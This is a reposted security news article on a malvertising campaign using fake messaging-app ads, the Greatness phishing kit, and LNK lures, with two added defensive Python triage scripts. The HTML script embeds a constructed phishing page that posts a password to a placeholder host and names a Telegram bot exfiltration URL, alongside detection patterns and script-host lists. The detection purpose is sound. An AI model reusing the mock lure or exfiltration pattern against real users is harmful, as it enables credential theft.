Malicious Google ad campaign targeting Chinese users, with Telegram as a lure

Posted by admin on 2024-01-28 20:56:36

Chinese-speaking users have been targeted by malicious Google ads for restricted messaging apps like Telegram as part of an ongoing malvertising campaign.

"The threat actor is abusing Google advertiser accounts to create malicious ads and pointing them to pages where unsuspecting users will download Remote Administration Trojans (RATs) instead," Malwarebytes' Jérôme Segura said in a Thursday report. "Such programs give an attacker full control of a victim's machine and the ability to drop additional malware."

It's worth noting that the activity, codenamed FakeAPP, is a continuation of a prior attack wave that targeted Hong Kong users searching for messaging apps like WhatsApp and Telegram on search engines in late October 2023.

The latest iteration of the campaign also adds messaging app LINE to the list of messaging apps, redirecting users to bogus websites hosted on Google Docs or Google Sites.

The Google infrastructure is used to embed links to other sites under the threat actor's control in order to deliver the malicious installer files that ultimately deploy trojans such as PlugX and Gh0st RAT.

Malwarebytes said it traced the fraudulent ads to two advertiser accounts named Interactive Communication Team Limited and Ringier Media Nigeria Limited that are based in Nigeria.

"It also appears that the threat actor privileges quantity over quality by constantly pushing new payloads and infrastructure as command-and-control," Segura said.

The development comes as Trustwave SpiderLabs disclosed a spike in the use of a phishing-as-a-service (PhaaS) platform called Greatness to create legitimate-looking credential harvesting pages targeting Microsoft 365 users.

"The kit allows for personalizing sender names, email addresses, subjects, messages, attachments, and QR codes, enhancing relevance and engagement," the company said, adding that it ships with anti-detection measures, such as randomized headers, encoding, and obfuscation, that aim to bypass spam filters and security systems.

Greatness is offered for sale to other criminal actors for $120 per month, effectively lowering the barrier to entry and helping them conduct attacks at scale.

Attack chains entail sending phishing emails bearing malicious HTML attachments that, when opened by the recipients, direct them to a fake login page that captures the login credentials entered and exfiltrates the details to the threat actor via Telegram.

Other infection sequences have leveraged the attachments to drop malware on the victim's machine to facilitate information theft.

To increase the likelihood of success of the attack, the email messages spoof trusted sources like banks and employers and induce a false sense of urgency using subjects like "urgent invoice payments" or "urgent account verification required."

"The number of victims is unknown at this time, but Greatness is widely used and well-supported, with its own Telegram community providing information on how to operate the kit, along with additional tips and tricks," Trustwave said.

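The attack chain described above (an HTML attachment that opens a fake login page and hands the captured credentials to a Telegram bot) leaves static traits that a mail gateway can score before the attachment ever reaches a user. The following Python is an added example written for this page; it is not code from the article, from Trustwave SpiderLabs, or from the Greatness kit. The sample attachments, the sender domain `contoso.example`, and the heuristics (a body unpacked with `atob()` at load time, a password form posting to a host outside the sender's domain, a Telegram Bot API `sendMessage` URL, urgency wording) are this example's own assumptions, not indicators published by the report.

```python
"""Heuristic triage of an HTML e-mail attachment for credential-phishing traits.

Added example, not code from the article or from Trustwave SpiderLabs. The
sample attachments below are constructed in this file, not captured.
"""
import base64
import re
from urllib.parse import urlparse

# Base64 text handed to atob(): the page body is unpacked in the browser.
ATOB_RE = re.compile(r"atob\(\s*['\"]([A-Za-z0-9+/=]{16,})['\"]\s*\)")
PASSWORD_RE = re.compile(r"<input[^>]*type\s*=\s*['\"]?password", re.I)
FORM_ACTION_RE = re.compile(r"<form[^>]*action\s*=\s*['\"]([^'\"]+)", re.I)
TELEGRAM_RE = re.compile(r"api\.telegram\.org/bot[^/\s'\"]+/sendMessage", re.I)
URGENCY_RE = re.compile(r"urgent|immediately|account (?:verification|suspended)", re.I)


def unpack_layers(html):
    """Return the page plus every base64 string it passes to atob(), decoded."""
    layers = [html]
    for match in ATOB_RE.finditer(html):
        try:
            blob = base64.b64decode(match.group(1), validate=True)
        except ValueError:          # binascii.Error is a ValueError subclass
            continue
        layers.append(blob.decode("utf-8", "replace"))
    return layers


def triage_html(html, sender_domain):
    """Return the list of phishing traits found; an empty list means none."""
    findings = []
    layers = unpack_layers(html)
    if len(layers) > 1:
        findings.append("page body unpacked from base64 with atob() at load time")
    text = "\n".join(layers)    # scan the outer page and every decoded layer
    if PASSWORD_RE.search(text):
        findings.append("password field inside an e-mail attachment")
    for action in FORM_ACTION_RE.findall(text):
        host = urlparse(action).hostname or ""
        if host and not host.endswith(sender_domain):
            findings.append("credential form posts to third-party host " + host)
    if TELEGRAM_RE.search(text):
        findings.append("Telegram Bot API sendMessage URL used as drop point")
    if URGENCY_RE.search(text):
        findings.append("urgency wording in visible text")
    return findings


# Constructed lure: outer page only unpacks a base64 body; the inner page holds
# the fake login form. Hostnames and the bot token are placeholders.
INNER_HTML = """<h2>Urgent account verification required</h2>
<form action="https://login.example.invalid/verify" method="post">
<input type="email" name="u"><input type="password" name="p"><input type="submit">
</form>
<script>var drop = "https://api.telegram.org/bot0000000000:PLACEHOLDER_TOKEN/sendMessage";</script>
"""
LURE_HTML = ('<html><body><script>document.write(atob("%s"));</script></body></html>'
             % base64.b64encode(INNER_HTML.encode()).decode())
# Constructed benign attachment from the same sender.
BENIGN_HTML = ('<html><body><p>Monthly newsletter from Contoso. '
               '<a href="https://contoso.example/news">Read more</a></p></body></html>')

if __name__ == "__main__":
    for label, doc in (("lure", LURE_HTML), ("benign", BENIGN_HTML)):
        print(label, triage_html(doc, "contoso.example") or ["no findings"])
```

Each trait on its own is weak (newsletters use urgency words, some legitimate forms post to a different domain), so the findings are returned as a list for a gateway to weigh rather than as a single verdict; the decoded layers are scanned along with the outer page because the visible HTML of such attachments is often only the unpacking stub.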
Phishing attacks have also been observed striking South Korean companies using lures that impersonate tech companies like Kakao to distribute AsyncRAT via malicious Windows shortcut (LNK) files.

"Malicious shortcut files disguised as legitimate documents are continuously being distributed," the AhnLab Security Intelligence Center (ASEC) said. "Users can mistake the shortcut file for a normal document, as the '.LNK' extension is not visible on the names of the files."

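Because Explorer never displays the `.LNK` extension, a shortcut named like a document is hard to tell apart from the document it imitates, and the only reliable way to see what it would launch is to read the shortcut's own structure. The following Python is an added example written for this page, not code from the article, from AhnLab/ASEC, or from the campaign. It reads the MS-SHLLINK layout (fixed 76-byte header, optional IDList and LinkInfo, then the StringData items) and reports three traits: a document-style double extension, a target or argument string naming a script host, and a ShowCommand that keeps the launched window out of sight. The script-host and document-extension lists are this example's own choices, and the sample shortcuts are constructed in the file with `build_lnk()`; they are not captured samples.

```python
"""Static triage of Windows shortcut (.LNK) files posing as documents.

Added example, not code from the article or from AhnLab/ASEC. The sample
shortcuts are constructed here with build_lnk(); they are not captured files.
"""
import struct

HEADER_SIZE = 0x4C
# LinkCLSID 00021401-0000-0000-C000-000000000046 in its on-disk byte order
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
SHOW_COMMAND_OFFSET = 0x3C

# LinkFlags bits (MS-SHLLINK 2.1.1); StringData items appear in this order
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_RELATIVE_PATH = 0x08
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80
STRING_FIELDS = ((0x04, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (0x10, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location"))
SW_SHOWMINNOACTIVE = 7  # ShowCommand: open minimised, without taking focus

# Lists chosen for this example; tune them for your environment.
SCRIPT_HOSTS = ("cmd.exe", "powershell", "pwsh", "mshta", "wscript",
                "cscript", "rundll32", "regsvr32")
DOCUMENT_EXTENSIONS = (".pdf", ".doc", ".docx", ".xls", ".xlsx",
                       ".ppt", ".pptx", ".txt", ".hwp")


def _read_string(data, pos, is_unicode):
    """Read one StringData item: 2-byte character count, then the characters."""
    (count,) = struct.unpack_from("<H", data, pos)
    pos += 2
    if is_unicode:
        end = pos + 2 * count
        return data[pos:end].decode("utf-16-le"), end
    end = pos + count
    return data[pos:end].decode("cp1252", "replace"), end


def parse_lnk(data):
    """Return the StringData fields and ShowCommand of a shell link."""
    if len(data) < HEADER_SIZE:
        raise ValueError("too short to be a shell link")
    header_size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if header_size != HEADER_SIZE or clsid != LINK_CLSID:
        raise ValueError("missing shell link header")
    (show_command,) = struct.unpack_from("<I", data, SHOW_COMMAND_OFFSET)
    pos = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:   # skip IDList: 2-byte size + items
        (id_list_size,) = struct.unpack_from("<H", data, pos)
        pos += 2 + id_list_size
    if flags & HAS_LINK_INFO:             # skip LinkInfo: size counts itself
        (link_info_size,) = struct.unpack_from("<I", data, pos)
        pos += link_info_size
    fields = {"show_command": show_command}
    for bit, key in STRING_FIELDS:
        if flags & bit:
            fields[key], pos = _read_string(data, pos, bool(flags & IS_UNICODE))
        else:
            fields[key] = ""
    return fields


def triage_lnk(filename, data):
    """Return the list of suspicious traits found in one shortcut file."""
    info = parse_lnk(data)
    findings = []
    lower = filename.lower()
    stem = lower[:-4] if lower.endswith(".lnk") else ""
    if stem.endswith(DOCUMENT_EXTENSIONS):
        findings.append("document-style double extension; Explorer hides '.lnk'")
    launch = (info["relative_path"] + " " + info["arguments"]).lower()
    hosts = [h for h in SCRIPT_HOSTS if h in launch]
    if hosts:
        findings.append("launches a script host: " + ", ".join(hosts))
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        findings.append("ShowCommand=SW_SHOWMINNOACTIVE keeps the window out of sight")
    return findings


def build_lnk(relative_path, arguments, icon_location, show_command):
    """Construct a minimal shell link for testing (no IDList, no LinkInfo)."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | HAS_ICON_LOCATION | IS_UNICODE
    header = struct.pack("<I16sI", HEADER_SIZE, LINK_CLSID, flags)
    header += struct.pack("<I", 0) + b"\x00" * 24       # FileAttributes, 3 FILETIMEs
    header += struct.pack("<III", 0, 0, show_command)   # FileSize, IconIndex, ShowCommand
    header += struct.pack("<HHII", 0, 0, 0, 0)          # HotKey, Reserved1..3
    body = b""
    for text in (relative_path, arguments, icon_location):   # StringData order
        body += struct.pack("<H", len(text)) + text.encode("utf-16-le")
    return header + body


# Constructed samples: a lure-style shortcut and a harmless one.
LURE_NAME = "Invoice_2024.pdf.lnk"
LURE_BYTES = build_lnk(r"..\..\..\Windows\System32\cmd.exe",
                       "/c echo constructed-sample",         # placeholder, no payload
                       r"%SystemRoot%\System32\shell32.dll", SW_SHOWMINNOACTIVE)
BENIGN_NAME = "Notes.lnk"
BENIGN_BYTES = build_lnk(r"..\Documents\notes.txt", "", "", 1)

if __name__ == "__main__":
    for name, blob in ((LURE_NAME, LURE_BYTES), (BENIGN_NAME, BENIGN_BYTES)):
        print(name, triage_lnk(name, blob) or ["no findings"])
```

Real shortcuts usually carry an IDList and LinkInfo before the strings, which is why `parse_lnk` skips those sections by their declared sizes instead of assuming the layout `build_lnk` produces; pointing the function at files collected from a mailbox or download folder is enough to list what each shortcut would run without opening it.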
Originally published on the WeChat public account 知机安全: Malicious Google ad campaign targeting Chinese users, with Telegram as a lure

Reposts should retain the link to this article (CN-SEC 中文网; thanks to the original author): http://cn-sec.com/archives/2437457.html
